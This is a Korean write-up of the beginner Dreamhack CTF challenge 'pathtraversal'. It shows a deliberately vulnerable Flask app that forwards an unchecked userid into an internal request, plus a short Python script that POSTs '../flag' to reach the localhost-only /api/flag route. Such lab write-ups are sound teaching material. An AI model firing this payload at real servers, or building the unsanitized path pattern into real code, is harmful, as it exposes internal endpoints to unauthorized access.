Home [Dreamhack] pathtraversal 해설
Post
Cancel

[Dreamhack] pathtraversal 해설

Posted Apr 3, 2026
By 박지율
3 min read

문제 특징

Querystring과 request라이브러리를 이용한 해킹

문제 이름: pathtraversal

난이도: Lv.Beginner

카테고리: 웹해킹

문제 구조

문제파일구성

1
2

/
└── app.py

주요 코드

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73

#!/usr/bin/python3
from flask import Flask, request, render_template, abort
from functools import wraps
import requests
import os, json

users = {
    '0': {
        'userid': 'guest',
        'level': 1,
        'password': 'guest'
    },
    '1': {
        'userid': 'admin',
        'level': 9999,
        'password': 'admin'
    }
}

def internal_api(func):
    @wraps(func)
    def decorated_view(*args, **kwargs):
        if request.remote_addr == '127.0.0.1':
            return func(*args, **kwargs)
        else:
            abort(401)
    return decorated_view

app = Flask(__name__)
app.secret_key = os.urandom(32)
API_HOST = 'http://127.0.0.1:8000'

try:
    FLAG = open('./flag.txt', 'r').read() # Flag is here!!
except:
    FLAG = '[**FLAG**]'

@app.route('/')
def index():
    return render_template('index.html')

@app.route('/get_info', methods=['GET', 'POST'])
def get_info():
    if request.method == 'GET':
        return render_template('get_info.html')
    elif request.method == 'POST':
        userid = request.form.get('userid', '')
        info = requests.get(f'{API_HOST}/api/user/{userid}').text
        return render_template('get_info.html', info=info)

@app.route('/api')
@internal_api
def api():
    return '/user/<uid>, /flag'

@app.route('/api/user/<uid>')
@internal_api
def get_flag(uid):
    try:
        info = users[uid]
    except:
        info = {}
    return json.dumps(info)

@app.route('/api/flag')
@internal_api
def flag():
    return FLAG

application = app #app.run(host='0.0.0.0', port=8000)
# Dockerfile
#     ENTRYPOINT ["uwsgi", "--socket", "0.0.0.0:8000", "--protocol=http", "--threads", "4", "--wsgi-file", "app.py"]

이 문제의 파일에서는 html 파일을 제공하지 않는다.

/api/flag에 플래그 키가 존재하나, @internal_api 함수에 의해 로컬 환경에서만 접속이 가능하도록 제한이 되어 있어 단순히 /api/flag 주소로 접속하여 플래그를 얻어낼 수 없다.

풀이

쿼리 스트링과 requests.get() 함수 활용하기

1
2
3
4
5
6
7
8

@app.route('/get_info', methods=['GET', 'POST'])
def get_info():
    if request.method == 'GET':
        return render_template('get_info.html')
    elif request.method == 'POST':
        userid = request.form.get('userid', '')
        info = requests.get(f'{API_HOST}/api/user/{userid}').text
        return render_template('get_info.html', info=info)

/get_info주소에 POST요청을 보냈을때, userid라는 파라미터의 값을 입력할 수 있다. userid파라미터는 info라는 변수에서 사용되는데, 이 변수는 request.get() 함수를 통해 /api/user/{userid} 주소에 get요청을 보낼수 있으므로, userid파라미터에 리소스 경로를 입력하면 /api/flag에도 접속이 가능할 것이다.

POST요청을 통해서만 해당 과정이 이루어지므로, 파이썬 파일을 하나 생성하여 POST요청을 보내보자.

1
2
3
4
5

import requests

url = "http://<서버주소>/get_info"
r = requests.post(url, data={"userid": "../flag"})
print(r.text)

해당 요청을 전송하면 get_info.html파일 속에 플래그가 함께 담겨 나오게 된다.

정답

1
2
3
4
5

import requests

url = "http://<서버주소>/get_info"
r = requests.post(url, data={"userid": "../flag"})
print(r.text)
Dreamhack
dreamhack WebHacking
Contents